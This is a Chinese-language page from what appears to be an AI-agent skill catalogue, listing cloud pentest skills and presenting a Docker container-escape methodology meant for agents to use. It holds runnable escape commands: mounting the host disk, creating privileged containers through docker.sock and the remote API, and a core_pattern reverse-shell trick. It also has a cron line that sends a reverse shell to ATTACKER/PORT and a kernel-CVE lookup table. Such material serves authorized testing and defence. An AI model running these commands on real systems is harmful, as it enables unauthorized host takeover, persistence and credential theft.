菜单
Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产(Blob Storage/App Service/Azure VM/Azure Functions)、获取 Azure 凭据(Service Principal/Managed Identity/Access Token)、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面
GCP 云环境攻击方法论。当目标使用 Google Cloud Platform、发现 GCP Service Account/Metadata/Storage Bucket 时使用。覆盖 Metadata 服务利用、Service Account 密钥窃取、IAM 提权、GKE 逃逸、Storage Bucket 枚举
GCP 云环境渗透测试总体方法论。当目标使用 Google Cloud Platform、发现 GCP 相关资产(GCS Bucket/Compute Engine/Cloud Functions/GKE)、获取 GCP 凭据(Service Account Key/OAuth Token/Metadata Token)、或需要对 GCP 环境进行安全评估时使用。提供从未授权枚举到提权、后渗透、GCP-to-Workspace 穿越的全流程决策树。覆盖 37+ GCP 服务攻击面
Serverless/云函数安全测试与攻击。当目标涉及 AWS Lambda、腾讯云 SCF、阿里云 FC、Azure Functions 等 Serverless 服务时使用。当发现 API Gateway 后端是 Lambda/SCF 触发、通过 cloud-aksk-exploit 获取到函数操作权限、或需要分析云函数代码中的漏洞时使用。覆盖事件注入(HTTP/OSS/消息队列触发器参数篡改)、环境变量泄露(硬编码凭据提取)、函数代码注入/覆盖(UpdateFunctionCode)、Runtime 利用(/tmp 写入/Layer 劫持/依赖投毒)、临时凭据滥用。发现任何 Lambda/SCF/云函数、API Gateway、或 Serverless 架构时都应使用此 skill
腾讯云渗透测试方法论。当目标使用腾讯云服务、发现 cos.*.myqcloud.com 资产、获取腾讯云 SecretId/SecretKey、在 CVM 实例内可访问 metadata.tencentyun.com 元数据、或需要对腾讯云 CAM/CVM/COS/TencentDB/TKE/SCF 等服务进行安全评估时使用。覆盖 CAM 提权、CVM 接管、COS 对象存储利用、TencentDB 数据库攻击、TKE 容器集群、SCF 云函数、CLB 负载均衡、CLS 日志服务、KMS 密钥管理
Java 源码注入类漏洞审计。当在 Java 白盒审计中需要检测注入类漏洞时触发。 覆盖 6 种注入: SQL 注入(JDBC/MyBatis/Hibernate/JPA)、命令注入(Runtime.exec/ProcessBuilder)、 SSRF(HttpURLConnection/OkHttp/RestTemplate)、LDAP 注入、SpEL/OGNL 表达式注入、NoSQL 注入(MongoDB)。 需要 java-audit-pipeline 提供的数据流证据(EVID_*)作为审计输入。
| name | docker-pentesting |
| description | Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能 |
| metadata | {"tags":"docker,container,registry,image,container escape,逃逸,容器,镜像层,docker.sock,docker api,cgroup,runc,namespace,procfs,core_pattern,capabilities,dirtycow,dirtypipe","category":"cloud","mitre_attack":"T1611,T1610,T1613"} |
Docker 攻击面不只有逃逸:容器配置、Docker Daemon、Registry、镜像层、构建上下文和宿主机共享内核都会形成不同的突破路径。先判断自己处在容器内、宿主机用户态还是远程 Registry/API 视角,再选择逃逸、凭据提取或供应链横向。
# 确认在容器中
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "IN DOCKER"
ls /.dockerenv 2>/dev/null && echo "IN DOCKER"
cat /proc/1/sched | head -1 # PID 1 不是 systemd/init → 容器
# 基础信息
hostname
cat /etc/os-release
uname -r # 内核版本(宿主机共享)
按成功率排序检查:
# 1. 特权容器?(最简单的逃逸)
cat /proc/1/status | grep CapEff
# 0000003fffffffff = 特权容器(拥有全部 capabilities)
# 2. Docker Socket 挂载?
ls -la /var/run/docker.sock 2>/dev/null
# 3. procfs 挂载?(core_pattern 逃逸)
# 检查是否一个在 /proc 下、一个在其他挂载路径下
find / -name core_pattern 2>/dev/null
# 4. Docker Remote API 暴露?
# 推测宿主机 IP:优先 hostname -I 取同网段 .1,为空则用 ip route 默认网关
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
timeout 3 bash -c "echo >/dev/tcp/$GW/2375" 2>/dev/null && echo "DOCKER API EXPOSED on $GW:2375"
# 5. 宿主机目录挂载?
mount | grep -v 'overlay\|proc\|sys\|cgroup\|tmpfs\|devpts\|mqueue'
cat /proc/mounts | grep -E '^/dev/'
# 6. Docker 用户组提权?(宿主机场景)
groups | grep docker || id | grep docker
cat /etc/group | grep docker
# 7. 危险 Capabilities?
cat /proc/1/status | grep Cap
# python3 解码: python3 -c "import struct;print(bin(struct.unpack('Q',bytes.fromhex('CAPEFF_HEX'))[0]))"
# 关注: CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_OVERRIDE, CAP_NET_ADMIN
# 8. PID namespace 共享?
ls /proc/*/exe 2>/dev/null | head -20
# 能看到大量非容器进程 → hostPID=true
# 9. 网络共享?
ip addr
# 能看到宿主机网卡(eth0 有宿主机 IP) → hostNetwork=true
# 10. 内核版本(判断可利用的 CVE)
uname -r
# 内核版本对照:
# 2.6.22 - 2016.10修复 → DirtyCow (CVE-2016-5195,几乎所有 2016 年前的内核)
# 4.6 - 5.9 → CVE-2020-14386
# >= 5.8 各稳定分支 → DirtyPipe (CVE-2022-0847)
# 修复版本: 5.16.11, 5.15.25, 5.10.102, 5.4.181
# 5.8.0 - 5.16 → CVE-2022-23222 (BPF)
# 2.6.19 - 5.12 → CVE-2021-22555 (Netfilter)
# Ubuntu 14.04-20.10 → OverlayFS (CVE-2021-3493)
# 11. 环境变量泄露?
env | sort
cat /proc/self/environ | tr '\0' '\n'
# 12. docker-compose 配置泄露?
find / -name "docker-compose*" 2>/dev/null
# 13. Registry / 镜像凭据?
cat ~/.docker/config.json 2>/dev/null
find / -path '*/.docker/config.json' 2>/dev/null
检查结果?
├─ 特权容器 → 挂载宿主机磁盘 / cgroup release_agent / nsenter(需 hostPID)
├─ Docker Socket → 创建特权容器逃逸(docker CLI 或 curl,详见 references)
├─ procfs 挂载 → core_pattern 管道符反弹 shell
├─ Docker Remote API 暴露 → 远程创建特权容器
├─ 宿主机目录挂载
│ ├─ /etc → 写 crontab/SSH key
│ └─ 其他目录 → 读写宿主机文件
├─ Docker 用户组(宿主机用户在 docker 组)→ docker run -v /:/host
├─ CAP_SYS_ADMIN → cgroup 逃逸 / mount
├─ CAP_SYS_PTRACE + hostPID → 注入宿主机进程
├─ CAP_DAC_READ_SEARCH → shocker / 配合 DirtyPipe
├─ hostNetwork → 访问宿主机服务/Metadata API
├─ 运行时 CVE(runc/containerd 版本过旧)→ CVE-2019-5736, CVE-2019-16884, CVE-2020-15257
├─ Registry 暴露或有镜像凭据 → 枚举仓库/tag/blob,分析镜像层 Secret
├─ 信息收集(不直接逃逸但发现关键信息)
│ ├─ 环境变量 → 可含数据库密码、API Key、云凭证
│ ├─ Docker Registry / 镜像层 → 可含历史 Secret、kubeconfig、源码和制品 Token
│ └─ docker-compose.yml → 可含密码、挂载点、网络配置
└─ 以上都没有 → 内核漏洞(按版本匹配 CVE)
├─ >= 5.8 未修复 → DirtyPipe (CVE-2022-0847)
├─ 2.6.22+ 2016前 → DirtyCow (CVE-2016-5195)
├─ 5.8-5.16 → BPF 绕过 (CVE-2022-23222)
├─ 2.6.19-5.12 → Netfilter (CVE-2021-22555)
└─ Ubuntu 14-20 → OverlayFS (CVE-2021-3493)
详细命令 → [references/escape-methods.md](references/escape-methods.md)
mkdir -p /tmp/host && mount /dev/sda1 /tmp/host
cat /tmp/host/root/flag.txt
# 或 chroot /tmp/host bash
# 无 docker CLI 时用 curl(完整流程:查镜像 → 创建 → 启动 → 读日志)
SOCK=/var/run/docker.sock
IMAGE=$(curl -s --unix-socket $SOCK http://localhost/images/json | python3 -c "import json,sys;imgs=json.load(sys.stdin);print(imgs[0]['RepoTags'][0] if imgs else 'alpine')")
CID=$(curl -s --unix-socket $SOCK -X POST -H "Content-Type: application/json" \
http://localhost/containers/create \
-d "{\"Image\":\"$IMAGE\",\"Cmd\":[\"cat\",\"/mnt/root/flag.txt\"],\"HostConfig\":{\"Binds\":[\"/:/mnt\"],\"Privileged\":true}}" \
| python3 -c "import json,sys;print(json.load(sys.stdin)['Id'])")
curl -s --unix-socket $SOCK -X POST http://localhost/containers/$CID/start
sleep 2
curl -s --unix-socket $SOCK "http://localhost/containers/$CID/logs?stdout=true&stderr=true"
# 前提:宿主机 procfs 已挂载到容器中
# 找到容器在宿主机的绝对路径(从 upperdir 取父目录拼 /merged)
upperdir=$(sed -n 's/.*\bupperdir=\([^,]*\).*/\1/p' /proc/mounts)
host_path=$(dirname "$upperdir")/merged
# 写反弹 shell + 覆盖 core_pattern + 触发崩溃
echo -e "|${host_path}/tmp/.t.py \rcore " > /host/proc/sys/kernel/core_pattern
# 获取宿主机 IP(优先 hostname -I 推测,为空则用 ip route 网关)
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
docker -H tcp://$GW:2375 run -v /:/mnt -it alpine chroot /mnt bash
# 如果挂载了 /etc 或 /var/spool/cron
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'" > /host_etc/cron.d/pwn
# 当前用户在 docker 组即可
docker run -v /:/host -it alpine chroot /host sh
| 工具 | 用途 |
|---|---|
| CDK | 容器逃逸自动化检测+利用 |
| deepce | Docker 枚举脚本 |
| amicontained | 容器环境检测 |